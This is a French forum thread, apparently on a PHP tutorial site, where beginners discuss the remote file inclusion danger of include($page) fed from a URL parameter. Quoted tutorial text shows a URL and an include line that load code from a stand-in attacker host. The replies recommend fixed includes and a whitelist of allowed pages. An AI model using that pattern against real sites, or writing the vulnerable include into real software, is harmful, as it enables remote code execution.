Bonjour,

J'ai lu le chapitre des includes, et une question me trotte dans la tête.

Citation : Mateo

Si l'url contient index.php?page=minichat, alors on incluera minichat.php
Si l'url contient index.php?page=news, alors on incluera news.php
Si l'url contient index.php?page=forum, alors on incluera forum.php
Si l'url contient index.php?page=http://www.hacker.com/pagespeciale, alors on incluera http://www.hacker.com/pagespeciale.php

Euh, attends une minute là, tu peux m'expliquer le dernier exemple ?

Oui, je crois que des explications s'imposent... Regardez en haut de cette page web, vous pouvez modifier facilement l'url, donc modifier facilement la page qui sera incluse !!! Et vu le code PHP qui a été utilisé, on peut très facilement inclure une page située sur un autre site ! Du coup, en modifiant juste l'url de la page, PHP va exécuter cette instruction :
<?php include("http://www.hacker.com/pagespeciale.php"); ?>

Voila cette technique dite "dangereuse" permet à une personne mal intentionné d'avoire accès à des choses privées ! Voila ma question :
Si je veux inclure un menu, un titre et un minichat celon la première technique, est-ce qu'à cause du minichat la personne pourrais hacker mon site ?

Pourtant la réponse est évidente, il le dit clairement que c'est très faillible.
Un include($page) c'est pas bon du tout.
En revanche un include('page.php') ne comporte aucun risque car tu définis la page à inclure.

Une des solutions est de mettre toutes les pages autorisées dans un array et de vérifier à chaque inclusion si la page demandé est dans cet array.

Donc ma technique est sans danger ! ?

Tu utilises la technique sure, donc sois tranquille.

Utilises l'autre technique une fois que tu auras maitrisé les Regex Php, ainsi que les principes de sécu Php.

@++

Cirilo

Est-ce que du moment que l'on a un include en haut et 1 en bas ca suffit pour la sécurité du site ? ou j'me plante la ????